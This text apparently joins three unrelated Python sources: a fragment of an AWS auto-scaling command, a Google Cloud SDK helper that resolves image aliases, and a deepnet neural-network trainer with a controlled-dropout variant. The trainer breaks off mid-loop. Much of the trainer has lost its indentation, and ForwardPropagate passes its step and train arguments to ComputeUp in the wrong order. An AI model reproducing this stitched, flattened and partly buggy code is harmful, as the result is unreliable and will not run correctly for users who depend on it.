        parser.add_argument('-M','--max',dest='max',type=int,help='new values');
        parser.add_argument('-d','--desired',dest='desired',type=int,help='desired');
        args = vars(parser.parse_args(args))
        minSize = args['min']
        maxSize = args['max']
        desired = args['desired']
        # NOTE(review): all three values are passed straight through; if any
        # flag is omitted, None is sent to the API — confirm that is intended.
        print "Setting desired capacity to {}-{}, {}".format(minSize,maxSize,desired)
        client = AwsConnectionFactory.getAsgClient()
        client.update_auto_scaling_group(AutoScalingGroupName=self.scalingGroup,MinSize=minSize,MaxSize=maxSize,DesiredCapacity=desired)
        #client.set_desired_capacity(AutoScalingGroupName=self.scalingGroup,DesiredCapacity=value,HonorCooldown=True)
        print "Scaling activity in progress"
| |
# Copyright 2014 Google Inc. All Rights Reserved.
"""Common classes and functions for images."""
from googlecloudsdk.compute.lib import constants
from googlecloudsdk.compute.lib import request_helper
from googlecloudsdk.compute.lib import utils
from googlecloudsdk.core import log
from googlecloudsdk.core.util import console_io
class ImageResourceFetcher(object):
  """Mixin class for displaying images.

  NOTE(review): declared empty here; presumably behavior is contributed by
  the classes this is mixed into — confirm against the rest of the package.
  """
class ImageExpander(object):
  """Mixin class for expanding image aliases.

  Expects the mixing class to provide: self.compute, self.messages,
  self.http, self.batch_url, self.project and self.resources.
  """
  def GetMatchingImages(self, image, alias, errors):
    """Yields images from a public image project and the user's project.

    Args:
      image: The image name as given by the user.
      alias: An entry of constants.IMAGE_ALIASES (has name_prefix, project).
      errors: A list that request errors are appended to.
    Returns:
      An iterator over image resources from both list requests.
    """
    service = self.compute.images
    requests = [
        # All versioned images in the public project for this alias, e.g.
        # names matching ^<prefix>(-.+)*-v.+ ("debian-7-wheezy-v20140718").
        (service,
         'List',
         self.messages.ComputeImagesListRequest(
             filter='name eq ^{0}(-.+)*-v.+'.format(alias.name_prefix),
             maxResults=constants.MAX_RESULTS_PER_PAGE,
             project=alias.project)),
        # An exact-name match in the user's own project.
        (service,
         'List',
         self.messages.ComputeImagesListRequest(
             filter='name eq ^{0}$'.format(image),
             maxResults=constants.MAX_RESULTS_PER_PAGE,
             project=self.project)),
    ]
    return request_helper.MakeRequests(
        requests=requests,
        http=self.http,
        batch_url=self.batch_url,
        errors=errors,
        custom_get_requests=None)
  def GetImage(self, image_ref):
    """Returns the image resource corresponding to the given reference.

    Raises:
      ToolException: If the image could not be fetched.
    """
    errors = []
    res = list(request_helper.MakeRequests(
        requests=[(self.compute.images,
                   'Get',
                   self.messages.ComputeImagesGetRequest(
                       image=image_ref.Name(),
                       project=image_ref.project))],
        http=self.http,
        batch_url=self.batch_url,
        errors=errors,
        custom_get_requests=None))
    if errors:
      utils.RaiseToolException(
          errors,
          error_message='Could not fetch image resource:')
    return res[0]
  def ExpandImageFlag(self, args, return_image_resource=False):
    """Resolves the --image flag value.

    If the value of --image is one of the aliases defined in the
    constants module, both the user's project and the public image
    project for the alias are queried. Otherwise, only the user's
    project is queried. If --image is an alias and --image-project is
    provided, only the given project is queried.

    Args:
      args: The command-line flags. The flags accessed are --image and
        --image-project.
      return_image_resource: If True, always makes an API call to also
        fetch the image resource.

    Returns:
      A tuple where the first element is the self link of the image. If
      return_image_resource is False, the second element is None, otherwise
      it is the image resource.
    """
    image_ref = self.resources.Parse(
        args.image or constants.DEFAULT_IMAGE,
        collection='compute.images',
        resolve=False)
    # If an image project was specified, then assume that image refers
    # to an image in that project.
    if args.image_project:
      image_project_ref = self.resources.Parse(
          args.image_project,
          collection='compute.projects')
      image_ref.project = image_project_ref.Name()
      image_ref.Resolve()
      return (image_ref.SelfLink(),
              self.GetImage(image_ref) if return_image_resource else None)
    image_ref.Resolve()
    alias = constants.IMAGE_ALIASES.get(image_ref.Name())
    # If the image name given is not an alias and no image project was
    # provided, then assume that the image value refers to an image in
    # the user's project.
    if not alias:
      return (image_ref.SelfLink(),
              self.GetImage(image_ref) if return_image_resource else None)
    # At this point, the image is an alias and now we have to find the
    # latest one among the public image project and the user's
    # project.
    errors = []
    images = self.GetMatchingImages(image_ref.Name(), alias, errors)
    user_image = None
    public_images = []
    for image in images:
      # Deprecated images are never candidates.
      if image.deprecated:
        continue
      if '/projects/{0}/'.format(self.project) in image.selfLink:
        user_image = image
      else:
        public_images.append(image)
    if errors or not public_images:
      # This raises, so execution never continues past here on failure.
      utils.RaiseToolException(
          errors,
          'Failed to find image for alias [{0}] in public image project [{1}].'
          .format(image_ref.Name(), alias.project))
    def GetVersion(image):
      """Extracts the "20140718" from an image name like "debian-v20140718"."""
      parts = image.name.rsplit('v', 1)
      if len(parts) != 2:
        log.debug('Skipping image with malformed name [%s].', image.name)
        return None
      return parts[1]
    # Pick the newest public image by its version suffix.
    public_candidate = max(public_images, key=GetVersion)
    if user_image:
      # The alias also names an image in the user's project; let the user
      # choose between the two (defaulting to their own image).
      options = [user_image, public_candidate]
      idx = console_io.PromptChoice(
          options=[image.selfLink for image in options],
          default=0,
          message=('Found two possible choices for [--image] value [{0}].'
                   .format(image_ref.Name())))
      res = options[idx]
    else:
      res = public_candidate
    log.debug('Image resolved to [%s].', res.selfLink)
    return (res.selfLink, res if return_image_resource else None)
def HasWindowsLicense(resource, resource_parser):
  """Returns True if the given image or disk carries a Windows license.

  Args:
    resource: An image or disk resource with a `licenses` list of URIs.
    resource_parser: Parser used to resolve each license URI.
  """
  # Parse each license URI and check whether it lives in the Windows
  # image project; any() short-circuits on the first match, exactly as the
  # original early-return loop did.
  return any(
      resource_parser.Parse(uri, collection='compute.licenses').project ==
      constants.WINDOWS_IMAGE_PROJECT
      for uri in resource.licenses)
def AddImageProjectFlag(parser):
  """Adds the --image-project flag to the given parser.

  Bug fix: the original docstring claimed this adds the "--image" flag,
  but the argument registered here is --image-project.

  Args:
    parser: The argparse-style parser to register the flag on.
  """
  image_project = parser.add_argument(
      '--image-project',
      help='The project against which all image references will be resolved.')
  # detailed_help is picked up by the help generator; kept verbatim.
  image_project.detailed_help = """\
      The project against which all image references will be
      resolved. See ``--image'' for more details.
      """
def GetImageAliasTable():
  """Returns help text that explains the image aliases.

  Portability fix: uses dict.items() instead of the Python-2-only
  dict.iteritems(); sorted() over either yields the same result.
  """
  # Note: The leading spaces are very important in this string. The
  # final help text is dedented, so if the leading spaces are off, the
  # help will not be generated properly.
  return """The value for this option can be the name of an image or an
      alias from the table below.

      [options="header",format="csv",grid="none",frame="none"]
      |========
      Alias,Project,Image Name
      {0}
      |========

      When the value is an alias, this tool will query the public
      image project that contains the image type to find the
      latest image matching the alias. The user's project is also
      queried for an image with the same name as the alias. If a
      conflict exists, the user will be prompted to resolve the
      conflict.

      To specify an image in another project for which there is no
      alias, use ``--image-project''. When ``--image-project'' is
      present, no API calls are made to resolve the image. This
      property is useful for scripts.""".format(
          '\n      '.join(
              ','.join([alias, project, image_name])
              for alias, (project, image_name) in
              sorted(constants.IMAGE_ALIASES.items())))
| |
"""Implements a feed-forward neural net."""
import gzip
import logging
import sys
import time
import csv
from google.protobuf import text_format
from datahandler import *
from convolutions import *
from edge import *
from layer import *
from util import *
from logistic_layer import *
from tanh_layer import *
from relu_layer import *
from smooth_relu_layer import *
from linear_layer import *
from softmax_layer import *
from replicated_softmax_layer import *
from cos_layer import *
from sin_layer import *
from transfer_edge import *
from soft_transfer_edge import *
import eigenmat as mat
class NeuralNet(object):
def __init__(self, net, cd=False, t_op=None, e_op=None):
self.net = None
if isinstance(net, deepnet_pb2.Model):
self.net = net #ff
elif isinstance(net, str) or isinstance(net, unicode):
self.net = ReadModel(net)
self.t_op = None
if isinstance(t_op, deepnet_pb2.Operation):
self.t_op = t_op
elif isinstance(t_op, str) or isinstance(net, unicode):
self.t_op = ReadOperation(t_op)
self.e_op = None
if isinstance(e_op, deepnet_pb2.Operation):
self.e_op = e_op #ff
elif isinstance(e_op, str) or isinstance(net, unicode):
self.e_op = ReadOperation(e_op)
cm.CUDAMatrix.init_random(self.net.seed)
np.random.seed(self.net.seed)
self.data = None
self.layer = [] # has bias
self.edge = [] # has weight
self.input_datalayer = []
self.output_datalayer = []
self.datalayer = []
self.tied_datalayer = []
self.unclamped_layer = []
self.verbose = False
self.batchsize = 0
if self.t_op: #ff
self.verbose = self.t_op.verbose
self.batchsize = self.t_op.batchsize
elif self.e_op:
self.verbose = self.e_op.verbose
self.batchsize = self.e_op.batchsize
self.train_stop_steps = sys.maxint
self.cd = cd
  def PrintNetwork(self):
    """Prints each layer's name and its neighbouring layers to stdout."""
    for layer in self.layer:
      print layer.name
      layer.PrintNeighbours()
  def DeepCopy(self):
    """Returns a deep copy of the underlying model proto."""
    return CopyModel(self.net)
  def LoadModelOnGPU(self, batchsize=-1):
    """Load the model on the GPU.

    Builds Layer and Edge objects from the model proto, merging per-layer
    and per-edge hyperparams with the net-wide defaults, resolving tied
    parameters, and computing the forward-prop node ordering.

    Args:
      batchsize: Batch size to allocate for; if negative, taken from the
        training op (preferred) or else the eval op.
    """
    if batchsize < 0:
      if self.t_op:
        batchsize=self.t_op.batchsize
      else:
        batchsize=self.e_op.batchsize
    for layer in self.net.layer:
      # Fill in hyperparams the layer did not set from the net-wide defaults.
      layer.hyperparams.MergeFrom(LoadMissing(layer.hyperparams,
                                              self.net.hyperparams))
      if not layer.prefix:
        layer.prefix = self.net.prefix
      tied_to = None
      if layer.tied:
        # Tied layers share parameters with a previously created layer.
        tied_to = next(l for l in self.layer if l.name == layer.tied_to)
      self.layer.append(CreateLayer(Layer, layer, self.t_op, tied_to=tied_to))
    for edge in self.net.edge:
      # Merge order: net-wide defaults overridden by the edge's own settings.
      hyp = deepnet_pb2.Hyperparams()
      hyp.CopyFrom(self.net.hyperparams)
      hyp.MergeFrom(edge.hyperparams)
      edge.hyperparams.MergeFrom(hyp)
      try:
        node1 = next(layer for layer in self.layer if layer.name == edge.node1)
      except StopIteration:
        # NOTE(review): this only prints diagnostics; node1 stays unbound and
        # CreateEdge below will then raise NameError for an unknown layer.
        print edge.node1, [l.name for l in self.layer]
      node2 = next(layer for layer in self.layer if layer.name == edge.node2)
      if not edge.prefix:
        edge.prefix = self.net.prefix
      tied_to = None
      if edge.tied:
        tied_to = next(e for e in self.edge if e.node1.name == edge.tied_to_node1 and e.node2.name == edge.tied_to_node2)
      self.edge.append(CreateEdge(Edge, edge, node1, node2, self.t_op, tied_to=tied_to))
    self.input_datalayer = [node for node in self.layer if node.is_input]
    self.output_datalayer = [node for node in self.layer if node.is_output]
    self.node_list = self.Sort()
def ExchangeGlobalInfo(self):
for layer in self.layer:
layer.GetGlobalInfo(self)
for edge in self.edge:
edge.GetGlobalInfo(self)
  def Sort(self):
    """Topological sort.

    Kahn's algorithm over the layer graph: start from layers with no
    incoming neighbours and emit a layer once all of its incoming edges
    have been marked. Raises if the graph contains a cycle.
    """
    node_list = []
    S = [node for node in self.layer if not node.incoming_neighbour]
    while S:
      n = S.pop()
      node_list.append(n)
      for m in n.outgoing_edge:
        if m.marker == 0:
          m.marker = 1
          # Enqueue node2 once every one of its incoming edges is marked.
          if reduce(lambda a, edge: a and edge.marker == 1,
                    m.node2.incoming_edge, True):
            S.append(m.node2)
    # All edges marked => acyclic; otherwise a cycle kept some edge unmarked.
    if reduce(lambda a, edge: a and edge.marker == 1, self.edge, True):
      if self.verbose:
        print 'Fprop Order:'
        for node in node_list:
          print node.name
    else:
      raise Exception('Invalid net for backprop. Cycle exists.')
    return node_list
  def ComputeUp(self, layer, step, train=False, maxsteps=0):
    """
    Computes the state of `layer', given the state of its incoming neighbours.

    Args:
      layer: Layer whose state is to be computed.
      step: Training step.
      train: True if this computation is happening during training, False during evaluation.
      maxsteps: Maximum number of steps that will be taken (Needed because some
        hyperparameters may depend on this).
    Returns:
      A deepnet_pb2.Metrics with sparsity stats if the layer uses sparsity,
      else None.
    """
    layer.dirty = False
    perf = None
    if layer.is_input or layer.is_initialized: # for input layer
      layer.GetData()
    else:
      # state = activation(sum_i W_i^T * input_i + bias)
      for i, edge in enumerate(layer.incoming_edge):
        if edge in layer.outgoing_edge:
          continue
        inputs = layer.incoming_neighbour[i].state
        if edge.conv or edge.local:
          if i == 0:
            ConvolveUp(inputs, edge, layer.state)
          else:
            AddConvoleUp(inputs, edge, layer.state)
        else:
          w = edge.params['weight']
          factor = edge.proto.up_factor
          if i == 0:
            cm.dot(w.T, inputs, target=layer.state) # dot product between input and w
            if factor != 1:
              layer.state.mult(factor)
          else:
            layer.state.add_dot(w.T, inputs, mult=factor)
      b = layer.params['bias']
      if layer.replicated_neighbour is None:
        layer.state.add_col_vec(b)
      else:
        layer.state.add_dot(b, layer.replicated_neighbour.NN)
      layer.ApplyActivation() # apply activation function here
      # TODO: Done_Controlled dropout without dimension reduction
      # NOTE(review): activation == 3 presumably identifies the hidden-layer
      # activation type used by this project — confirm against deepnet_pb2.
      if self.cd == True:
        if not self.EvalNow(step):
          if layer.activation==3:
            # Controlled dropout: zero each unit's row with probability 0.5.
            a= layer.state.shape[0]
            b= np.random.choice(range(2),(a,1))
            # b = np.array([[1], [0], [1], [0], [1], [0], [1], [0], [1], [0]])
            layer.state.mult_by_col(mat.EigenMatrix(b))
        else:
          # multiply the dropout rate
          if layer.activation==3: # when it is hidden layer
            # Controlled dropout
            layer.state.mult(0.5)
    if layer.hyperparams.sparsity:
      # Collect per-dimension activity for the sparsity statistics.
      layer.state.sum(axis=1, target=layer.dimsize)
      perf = deepnet_pb2.Metrics()
      perf.MergeFrom(layer.proto.performance_stats)
      perf.count = layer.batchsize
      perf.sparsity = layer.dimsize.sum() / layer.dimsize.shape[0]
    if layer.hyperparams.dropout: # If there is dropout option in the hyperparams
      if train and maxsteps - step >= layer.hyperparams.stop_dropout_for_last:
        # Randomly set states to zero.
        if layer.hyperparams.mult_dropout:
          layer.mask.fill_with_randn()
          layer.mask.add(1)
          layer.state.mult(layer.mask)
        else:
          layer.mask.fill_with_rand()
          layer.mask.greater_than(layer.hyperparams.dropout_prob)
          if layer.hyperparams.blocksize > 1:
            layer.mask.blockify(layer.hyperparams.blocksize)
          layer.state.mult(layer.mask)
      else:
        # Produce expected output.
        if layer.hyperparams.mult_dropout:
          pass
        else:
          layer.state.mult(1.0 - layer.hyperparams.dropout_prob)
    return perf
  def ComputeDown(self, layer, step):
    """Backpropagate through this layer.

    Args:
      layer: The layer to backprop through.
      step: The training step. Needed because some hyperparameters depend on
        which training step they are being used in.
    Returns:
      The layer's loss if it is an output layer, else None.
    """
    if layer.is_input: # Nobody to backprop to.
      return
    # At this point layer.deriv contains the derivative with respect to the
    # outputs of this layer. Compute derivative with respect to the inputs.
    if layer.is_output:
      loss = layer.GetLoss(get_deriv=True)
    else:
      loss = None
      if layer.hyperparams.sparsity:
        sparsity_gradient = layer.GetSparsityGradient()
        layer.deriv.add_col_vec(sparsity_gradient)
      layer.ComputeDeriv()
    # Now layer.deriv contains the derivative w.r.t to the inputs.
    # Send it down each incoming edge and update parameters on the edge.
    for edge in layer.incoming_edge:
      if edge.conv or edge.local:
        AccumulateConvDeriv(edge.node1, edge, layer.deriv)
      else:
        self.AccumulateDeriv(edge.node1, edge, layer.deriv)
      self.UpdateEdgeParams(edge, layer.deriv, step)
    # $$ Update bias into the original bias vector here
    # Update the parameters on this layer (i.e., the bias).
    self.UpdateLayerParams(layer, step)
    # $$ Update small weight into the original weight matrix here
    return loss
  def AccumulateDeriv(self, layer, edge, deriv):
    """Accumulate the derivative w.r.t the outputs of this layer.

    A layer needs to compute derivatives w.r.t its outputs. These outputs may
    have been connected to lots of other nodes through outgoing edges.
    This method adds up the derivatives contributed by each outgoing edge.
    It gets derivatives w.r.t the inputs at the other end of its outgoing edge.

    Args:
      layer: The layer accumulating the derivative.
      edge: The edge which is sending the derivative.
      deriv: The derivative w.r.t the inputs at the other end of this edge.
    """
    if layer.is_input or edge.proto.block_gradient:
      return
    if layer.dirty: # If some derivatives have already been received.
      layer.deriv.add_dot(edge.params['weight'], deriv)
    else: # Receiving derivative for the first time.
      cm.dot(edge.params['weight'], deriv, target=layer.deriv)
      layer.dirty = True
  def UpdateEdgeParams(self, edge, deriv, step):
    """ Update the parameters associated with this edge.

    Update the weights and associated parameters.

    Args:
      edge: The edge whose weight is updated.
      deriv: Gradient w.r.t the inputs at the outgoing end.
      step: Training step.
    """
    numcases = edge.node1.batchsize
    if edge.conv or edge.local:
      ConvOuter(edge, edge.temp)
      edge.gradient.add_mult(edge.temp, mult=1.0/numcases)
    else:
      # grad += node1.state . deriv^T, averaged over the mini-batch.
      edge.gradient.add_dot(edge.node1.state, deriv.T, mult=1.0/numcases)
    if edge.tied_to:
      # Shared weights: push this edge's gradient into the master edge and
      # let the master apply the update once all shares have reported.
      edge.tied_to.gradient.add(edge.gradient)
      edge.gradient.assign(0)
      edge = edge.tied_to
    edge.num_grads_received += 1
    if edge.num_grads_received == edge.num_shares:
      edge.Update('weight', step)
  def UpdateLayerParams(self, layer, step):
    """ Update the parameters associated with this layer.

    Update the bias.

    Args:
      layer: The layer whose bias is updated.
      step: Training step.
    """
    # Bias gradient: row-sum of deriv, averaged over the mini-batch.
    layer.gradient.add_sums(layer.deriv, axis=1, mult=1.0 / layer.batchsize)
    if layer.tied_to:
      # Shared biases: accumulate into the master layer, update there.
      layer.tied_to.gradient.add(layer.gradient)
      layer.gradient.assign(0)
      layer = layer.tied_to
    layer.num_grads_received += 1
    if layer.num_grads_received == layer.num_shares:
      layer.Update('bias', step, no_reg=True) # By default, do not regularize bias.
def ForwardPropagate(self, train=False, step=0):
"""Do a forward pass through the network.
Args:
train: True if the forward pass is done during training, False during
evaluation.
step: Training step.
"""
losses = []
for node in self.node_list:
loss = self.ComputeUp(node, train, step, self.train_stop_steps)
if loss:
losses.append(loss)
return losses
def BackwardPropagate(self, step):
"""Backprop through the network.
Args:
step: Training step.
"""
losses = []
for node in reversed(self.node_list):
loss = self.ComputeDown(node, step)
if loss:
losses.append(loss)
return losses
def TrainOneBatch(self, step):
"""Train once on one mini-batch.
Args:
step: Training step.
Returns:
List of losses incurred at each output layer.
"""
losses1 = self.ForwardPropagate(train=True, step=step)
losses2 = self.BackwardPropagate(step)
losses1.extend(losses2)
return losses1
def EvaluateOneBatch(self):
"""Evaluate one mini-batch."""
losses = self.ForwardPropagate()
losses.extend([node.GetLoss() for node in self.output_datalayer])
return losses
  def Evaluate(self, validation=True, collect_predictions=False):
    """Evaluate the model.

    Args:
      validation: If True, evaluate on the validation set,
        else evaluate on test set.
      collect_predictions: If True, collect the predictions.
    Returns:
      The first accumulated stats object, or None if evaluation was skipped.
    """
    step = 0
    stats = []
    # Select the data getter, stop condition and stats sink for the split.
    if validation:
      stopcondition = self.ValidationStopCondition
      stop = stopcondition(step)
      if stop or self.validation_data_handler is None:
        return
      datagetter = self.GetValidationBatch
      prefix = 'V'
      stats_list = self.net.validation_stats
      num_batches = self.validation_data_handler.num_batches
    else:
      stopcondition = self.TestStopCondition
      stop = stopcondition(step)
      if stop or self.test_data_handler is None:
        return
      datagetter = self.GetTestBatch
      prefix = 'E'
      stats_list = self.net.test_stats
      num_batches = self.test_data_handler.num_batches
    if collect_predictions:
      # Pre-allocate space for every batch's predictions and targets.
      output_layer = self.output_datalayer[0]
      collect_pos = 0
      batchsize = output_layer.batchsize
      numdims = output_layer.state.shape[0]
      predictions = np.zeros((batchsize * num_batches, numdims))
      targets = np.zeros(predictions.shape)
    while not stop:
      datagetter()
      losses = self.EvaluateOneBatch()
      if collect_predictions:
        predictions[collect_pos:collect_pos + batchsize] = \
            output_layer.state.asarray().T
        targets[collect_pos:collect_pos + batchsize] = \
            output_layer.data.asarray().T
        collect_pos += batchsize
      if stats:
        # Accumulate this batch's losses into the running totals.
        for loss, acc in zip(losses, stats):
          Accumulate(acc, loss)
      else:
        stats = losses
      step += 1
      stop = stopcondition(step)
    if collect_predictions and stats:
      # Score only the rows that were actually filled.
      predictions = predictions[:collect_pos]
      targets = targets[:collect_pos]
      MAP, prec50, MAP_list, prec50_list = self.ComputeScore(predictions, targets)
      stat = stats[0]
      stat.MAP = MAP
      stat.prec50 = prec50
      for m in MAP_list:
        stat.MAP_list.extend([m])
      for m in prec50_list:
        stat.prec50_list.extend([m])
    for stat in stats:
      sys.stdout.write(GetPerformanceStats(stat, prefix=prefix))
    stats_list.extend(stats)
    # NOTE(review): `stat` is the last loop variable; if `stats` ended up
    # empty this raises UnboundLocalError — presumably never happens with a
    # non-empty dataset, but worth confirming.
    return stat
def ScoreOneLabel(self, preds, targets):
"""Computes Average precision and precision at 50."""
targets_sorted = targets[(-preds.T).argsort().flatten(),:]
cumsum = targets_sorted.cumsum()
prec = cumsum / np.arange(1.0, 1 + targets.shape[0])
total_pos = float(sum(targets))
if total_pos == 0:
total_pos = 1e-10
recall = cumsum / total_pos
ap = np.dot(prec, targets_sorted) / total_pos
prec50 = prec[50]
return ap, prec50
def ComputeScore(self, preds, targets):
"""Computes Average precision and precision at 50."""
assert preds.shape == targets.shape
numdims = preds.shape[1]
ap = 0
prec = 0
ap_list = []
prec_list = []
for i in range(numdims):
this_ap, this_prec = self.ScoreOneLabel(preds[:,i], targets[:,i])
ap_list.append(this_ap)
prec_list.append(this_prec)
ap += this_ap
prec += this_prec
ap /= numdims
prec /= numdims
return ap, prec, ap_list, prec_list
def WriteRepresentationToDisk(self, layernames, output_dir, memory='1G',
dataset='test', drop=False):
layers = [self.GetLayerByName(lname) for lname in layernames]
numdim_list = [layer.state.shape[0] for layer in layers]
if dataset == 'train':
datagetter = self.GetTrainBatch
if self.train_data_handler is None:
return
numbatches = self.train_data_handler.num_batches
size = numbatches * self.train_data_handler.batchsize
elif dataset == 'validation':
datagetter = self.GetValidationBatch
if self.validation_data_handler is None:
return
numbatches = self.validation_data_handler.num_batches
size = numbatches * self.validation_data_handler.batchsize
elif dataset == 'test':
datagetter = self.GetTestBatch
if self.test_data_handler is None:
return
numbatches = self.test_data_handler.num_batches
size = numbatches * self.test_data_handler.batchsize
datawriter = DataWriter(layernames, output_dir, memory, numdim_list, size)
for batch in range(numbatches):
datagetter()
sys.stdout.write('\r%d' % (batch+1))
sys.stdout.flush()
self.ForwardPropagate(train=drop)
reprs = [l.state.asarray().T for l in layers]
datawriter.Submit(reprs)
sys.stdout.write('\n')
return datawriter.Commit()
  def TrainStopCondition(self, step):
    """Returns True once `step` reaches the configured training step count."""
    return step >= self.train_stop_steps
  def ValidationStopCondition(self, step):
    """Returns True once `step` reaches the configured validation step count."""
    return step >= self.validation_stop_steps
  def TestStopCondition(self, step):
    """Returns True once `step` reaches the configured test step count."""
    return step >= self.test_stop_steps
  def EvalNow(self, step):
    """Returns True on steps where evaluation should run.

    NOTE(review): raises ZeroDivisionError if eval_now_steps is 0 —
    presumably configs always set it; confirm.
    """
    return step % self.eval_now_steps == 0
  def SaveNow(self, step):
    """Returns True on steps where a checkpoint should be written.

    NOTE(review): raises ZeroDivisionError if save_now_steps is 0 —
    presumably configs always set it; confirm.
    """
    return step % self.save_now_steps == 0
  def ShowNow(self, step):
    """Returns True on steps where visualization should run (0 disables it)."""
    return self.show_now_steps > 0 and step % self.show_now_steps == 0
def GetLayerByName(self, layername, down=False):
try:
l = next(l for l in self.layer if l.name == layername)
except StopIteration:
l = None
return l
def CopyModelToCPU(self):
for layer in self.layer:
layer.SaveParameters()
for edge in self.edge:
edge.SaveParameters()
def ResetBatchsize(self, batchsize):
self.batchsize = batchsize
for layer in self.layer:
layer.AllocateBatchsizeDependentMemory(batchsize)
for edge in self.edge:
edge.AllocateBatchsizeDependentMemory()
  def GetBatch(self, handler=None):
    """Fetches the next mini-batch from `handler` into the data layers.

    Resizes batch-size dependent buffers if the incoming batch is a
    different size (e.g. the last, partial batch of an epoch). Tied data
    layers are then filled from the layers they are tied to.

    Args:
      handler: Data handler to pull from; if None, only tied layers are set.
    """
    if handler:
      data_list = handler.Get()
      if data_list[0].shape[1] != self.batchsize:
        self.ResetBatchsize(data_list[0].shape[1])
      for i, layer in enumerate(self.datalayer):
        layer.SetData(data_list[i])
    for layer in self.tied_datalayer:
      data = layer.data_tied_to.data
      if data.shape[1] != self.batchsize:
        self.ResetBatchsize(data.shape[1])
      layer.SetData(data)
  def GetTrainBatch(self):
    """Fetches the next training mini-batch into the data layers."""
    self.GetBatch(self.train_data_handler)
  def GetValidationBatch(self):
    """Fetches the next validation mini-batch into the data layers."""
    self.GetBatch(self.validation_data_handler)
  def GetTestBatch(self):
    """Fetches the next test mini-batch into the data layers."""
    self.GetBatch(self.test_data_handler)
  def SetUpData(self, skip_outputs=False, skip_layernames=[]):
    """Setup the data.

    Walks the input/output layers, wiring tied layers to their sources and
    collecting dataset names, then creates the train/validation/test data
    handlers.

    Args:
      skip_outputs: If True, do not set up data for output layers.
      skip_layernames: Layer names to exclude from data setup.
    """
    hyp_list = []
    # name_list[0/1/2] collect train/validation/test dataset names.
    name_list = [[], [], []]
    for node in self.layer:
      if not (node.is_input or node.is_output):
        continue
      if skip_outputs and node.is_output:
        continue
      if node.name in skip_layernames:
        continue
      data_field = node.proto.data_field
      if data_field.tied:
        # Tied layers reuse another data layer's data instead of a handler.
        self.tied_datalayer.append(node)
        node.data_tied_to = next(l for l in self.datalayer\
                                 if l.name == data_field.tied_to)
      else:
        self.datalayer.append(node)
        hyp_list.append(node.hyperparams)
        if data_field.train:
          name_list[0].append(data_field.train)
        if data_field.validation:
          name_list[1].append(data_field.validation)
        if data_field.test:
          name_list[2].append(data_field.test)
    # The op proto supplies data paths/settings; prefer the training op.
    if self.t_op:
      op = self.t_op
    else:
      op = self.e_op
    handles = GetDataHandles(op, name_list, hyp_list,
                             verbose=self.verbose)
    self.train_data_handler = handles[0]
    self.validation_data_handler = handles[1]
    self.test_data_handler = handles[2]
  def SetUpTrainer(self):
    """Load the model, setup the data, set the stopping conditions."""
    self.LoadModelOnGPU()
    if self.verbose:
      self.PrintNetwork()
    self.SetUpData()
    # Training stops after one full epoch or a fixed number of steps.
    if self.t_op.stopcondition.all_processed:
      num_steps = self.train_data_handler.num_batches
    else:
      num_steps = self.t_op.stopcondition.steps
    self.train_stop_steps = num_steps
    # Validation/test evaluation lengths come from the eval op.
    if self.e_op.stopcondition.all_processed and self.validation_data_handler:
      num_steps = self.validation_data_handler.num_batches
    else:
      num_steps = self.e_op.stopcondition.steps
    self.validation_stop_steps = num_steps
    if self.e_op.stopcondition.all_processed and self.test_data_handler:
      num_steps = self.test_data_handler.num_batches
    else:
      num_steps = self.e_op.stopcondition.steps
    self.test_stop_steps = num_steps
    # Cadence (in steps) for evaluation, checkpointing and visualization.
    self.eval_now_steps = self.t_op.eval_after
    self.save_now_steps = self.t_op.checkpoint_after
    self.show_now_steps = self.t_op.show_after
    self.ExchangeGlobalInfo()
def Show(self):
"""Visualize the state of the layers and edges in the network."""
for layer in self.layer:
layer.Show()
for edge in self.edge:
edge.Show()
def Train(self):
"""Train the model."""
start_time = time.time()
assert self.t_op is not None, 't_op is None.'
assert self.e_op is not None, 'e_op is None.'
self.SetUpTrainer()
step = self.t_op.current_step
stop = self.TrainStopCondition(step)
stats = []
collect_predictions = False
try:
p = self.output_datalayer[0].proto.performance_stats
if p.compute_MAP or p.compute_prec50:
collect_predictions = True
except Exception as e:
pass
select_model_using_error = self.net.hyperparams.select_model_using_error
select_model_using_acc = self.net.hyperparams.select_model_using_acc
select_model_using_map = self.net.hyperparams.select_model_using_map
select_best = select_model_using_error or select_model_using_acc or select_model_using_map
if select_best:
best_valid_error = float('Inf')
test_error = float('Inf')
best_net = self.DeepCopy()
dump_best = False
with open('/home/hpc/github/ControlledDropout/deepnet/examples/csv/CDX.csv', 'w') as csvfile:
fieldnames = ['Step', 'T_CE', 'T_Acc', 'T_Res', 'V_CE', 'V_Acc', 'V_Res', 'E_CE', 'E_Acc', 'E_Res', 'Time']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
while not stop:
sys.stdout.write('\rTrain Step: %d' % step)
sys.stdout.flush()
self.GetTrainBatch()
#self.GetRandomNum()
losses = self.TrainOneBatch(step)
if stats:
for acc, loss in zip(stats, losses):
Accumulate(acc, loss)
else:
stats = losses
step += 1
if self.ShowNow(step):
self.Show()
if self.EvalNow(step):
# Print out training stats.
sys.stdout.write('\rStep %d ' % step)
for stat in stats:
sys.stdout.write(GetPerformanceStats(stat, prefix='T'))
self.net.train_stats.extend(stats)
stats = []
# Evaluate on validation set.
val = self.Evaluate(validation=True, collect_predictions=collect_predictions)
# Evaluate on test set.
tes = self.Evaluate(validation=False, collect_predictions=collect_predictions)
# Write on csv file
writer.writerow({'Step': step,
'T_CE': stat.cross_entropy / stat.count,
'T_Acc': stat.correct_preds / stat.count,
'T_Res': stat.correct_preds,
'V_CE': val.cross_entropy / val.count,
'V_Acc': val.correct_preds / val.count,
'V_Res': val.correct_preds,
'E_CE': tes.cross_entropy / tes.count,
'E_Acc': tes.correct_preds / tes.count,
'E_Res': tes.correct_preds,
'Time': time.time() - start_time
})
if select_best:
valid_stat = self.net.validation_stats[-1]
if len(self.net.test_stats) > 1:
test_stat = self.net.test_stats[-1]
else:
test_stat = valid_stat
if select_model_using_error:
valid_error = valid_stat.error / valid_stat.count
_test_error = test_stat.error / test_stat.count
elif select_model_using_acc:
valid_error = 1 - float(valid_stat.correct_preds) / valid_stat.count
_test_error = 1 - float(test_stat.correct_preds) / test_stat.count
elif select_model_using_map:
valid_error = 1 - valid_stat.MAP
_test_error = 1 - test_stat.MAP
if valid_error < best_valid_error:
best_valid_error = valid_error
test_error = _test_error
dump_best = True
self.CopyModelToCPU()
self.t_op.current_step = step
self.net.best_valid_stat.CopyFrom(valid_stat)
self.net.train_stat_es.CopyFrom(self.net.train_stats[-1])
self.net.test_stat_es.CopyFrom(test_stat)
best_net = self.DeepCopy()
best_t_op = CopyOperation(self.t_op)
#for e in self.edge:
